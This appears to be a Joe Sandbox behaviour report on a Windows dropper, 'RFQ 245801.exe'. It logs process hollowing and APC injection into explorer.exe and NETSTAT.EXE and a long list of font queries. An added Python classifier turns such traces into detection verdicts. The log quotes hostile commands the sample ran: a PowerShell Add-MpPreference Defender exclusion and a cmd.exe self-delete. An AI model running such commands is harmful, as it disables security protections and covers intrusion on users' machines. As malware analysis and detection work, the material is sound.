Source: C:\Users\user\Desktop\RFQ 245801.exe; NtQueueApcThread: Indirect: 0x1B9A4F2
Source: C:\Users\user\Desktop\RFQ 245801.exe; NtClose: Indirect: 0x1B9A56C
Source: C:\Users\user\Desktop\RFQ 245801.exe; Memory written: C:\Users\user\Desktop\RFQ 245801.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\RFQ 245801.exe; Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RFQ 245801.exe; Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RFQ 245801.exe; Thread register set: target process: 2580
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Thread register set: target process: 2580
Source: C:\Users\user\Desktop\RFQ 245801.exe; Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\RFQ 245801.exe; Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 640000
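The entries above are the primitives behind the hollowing and injection verdicts: the target's image unmapped (the NETSTAT.EXE image at 640000, which matches the 7_2_0064xxxx function addresses elsewhere in this section), a PE written at the image base (the 4D5A "MZ" bytes at 400000), thread context rewritten (the Thread register set entries) or an APC queued (NtQueueApcThread, reached here through an indirect syscall), and execute-read-write sections mapped into explorer.exe and NETSTAT.EXE. The Python below is an added example of turning such a trace into per-(source, target) verdicts that respect the order a hollowing chain needs; it is not Joe Sandbox's signature logic and not code from the sample. The event list is constructed: the loader name is a stand-in, the targets mirror this report, and the sequence is ordered as the calls are made rather than as the report groups them by signature.

```python
"""Correlate per-process injection primitives into hollowing / APC-injection verdicts.

Added example showing how observations like those listed above combine into a
verdict; it is not Joe Sandbox's signature logic and not code from the sample.
TRACE at the bottom is constructed, with a stand-in loader name, and ordered
as the primitives are used (a report lists them per signature, not in time order).
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Event:
    seq: int          # position in the trace
    source: str       # process issuing the call
    api: str          # normalised primitive, see TRACE
    target: str       # process acted upon
    detail: str = ""  # protection, address, first bytes written, ...


Pair = Tuple[str, str]


def _first_after(evs: List[Event], pred: Callable[[Event], bool], after: Optional[int]) -> Optional[int]:
    """Index of the first event after index `after` satisfying pred; None if the
    predecessor was missing (after is None) so that a broken chain stays broken."""
    if after is None:
        return None
    for i in range(after + 1, len(evs)):
        if pred(evs[i]):
            return i
    return None


def classify_pair(evs: List[Event]) -> List[str]:
    """Verdicts for one (source, target) pair; each chain must occur in order."""
    verdicts = []
    # Hollowing: unmap the target's image, write a new PE at the image base, then
    # redirect execution (SetThreadContext on the suspended thread, or an APC into it).
    i_unmap = _first_after(evs, lambda e: e.api == "unmap_section", -1)
    i_write = _first_after(evs, lambda e: e.api == "write_memory" and e.detail.startswith("MZ"), i_unmap)
    i_run = _first_after(evs, lambda e: e.api in ("set_thread_context", "queue_apc"), i_write)
    if i_run is not None:
        verdicts.append("process hollowing")
    # APC injection: map an executable section into the target, then queue an APC.
    i_map = _first_after(evs, lambda e: e.api == "map_section" and "execute" in e.detail, -1)
    i_apc = _first_after(evs, lambda e: e.api == "queue_apc", i_map)
    if i_apc is not None:
        verdicts.append("APC injection into mapped RWX section")
    return verdicts


def classify_trace(events: List[Event]) -> Dict[Pair, List[str]]:
    """Group events by (source, target) in sequence order; keep pairs with a verdict."""
    pairs: Dict[Pair, List[Event]] = {}
    for ev in sorted(events, key=lambda e: e.seq):
        pairs.setdefault((ev.source, ev.target), []).append(ev)
    result: Dict[Pair, List[str]] = {}
    for pair, evs in pairs.items():
        verdicts = classify_pair(evs)
        if verdicts:
            result[pair] = verdicts
    return result


# Constructed trace. "loader.exe" stands in for the dropper; targets mirror the report.
TRACE = [
    # The loader hollows a suspended copy of itself (cf. the 4D5A write at base 400000).
    Event(1, "loader.exe", "create_process", "loader.exe", "suspended"),
    Event(2, "loader.exe", "unmap_section", "loader.exe", "base 0x400000"),
    Event(3, "loader.exe", "write_memory", "loader.exe", "MZ at 0x400000"),
    Event(4, "loader.exe", "set_thread_context", "loader.exe", "entry point redirected"),
    # RWX section mapped into explorer.exe, then an APC queued to run it.
    Event(5, "loader.exe", "map_section", "explorer.exe", "execute and read and write"),
    Event(6, "loader.exe", "queue_apc", "explorer.exe", "NtQueueApcThread, indirect syscall"),
    # A system binary whose image is unmapped first (cf. NETSTAT.EXE at 640000).
    Event(7, "loader.exe", "map_section", "NETSTAT.EXE", "execute and read and write"),
    Event(8, "loader.exe", "unmap_section", "NETSTAT.EXE", "base 0x640000"),
    Event(9, "loader.exe", "write_memory", "NETSTAT.EXE", "MZ at 0x640000"),
    Event(10, "loader.exe", "set_thread_context", "NETSTAT.EXE", ""),
    # Negatives: a PE write with no unmap or redirect, and a redirect before the write.
    Event(11, "svchost.exe", "write_memory", "svchost.exe", "MZ at 0x400000"),
    Event(12, "other.exe", "unmap_section", "other.exe", "base 0x400000"),
    Event(13, "other.exe", "set_thread_context", "other.exe", ""),
    Event(14, "other.exe", "write_memory", "other.exe", "MZ at 0x400000"),
]

if __name__ == "__main__":
    for (src, dst), verdicts in classify_trace(TRACE).items():
        print(f"{src} -> {dst}: {', '.join(verdicts)}")
```

The ordering constraint is what keeps the rule quiet on legitimate loaders: a debugger or a .NET runtime also writes MZ-prefixed memory and sets thread contexts, but not after unmapping the target's own image and then handing it control. The netstat chain also shows why the report's "Section unmapped" line matters on its own: unmapping a system binary's image base is the signature step of hollowing, and the cmd.exe /c del that netstat launches afterwards is the hollowed process, not netstat, cleaning up the dropper.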
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 7_2_006438D2 memset,OpenProcess,K32GetModuleBaseNameW,CompareStringW,CompareStringW,GetSystemDirectoryW,LoadLibraryExW,GetProcAddress,K32GetModuleBaseNameW,CloseHandle,LocalFree,FreeLibrary, svchost.exe
Source: C:\Users\user\Desktop\RFQ 245801.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Users\user\Desktop\RFQ 245801.exe; Process created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe" (2 occurrences)
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ 245801.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 7_2_006458B6 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4150770824.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1730926312.00000000018A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.4142888075.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: 1Progman$
Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1730926312.00000000018A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1730926312.00000000018A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Users\user\Desktop\RFQ 245801.exe VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation (3 occurrences)
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation (2 occurrences)
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\RFQ 245801.exe; Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
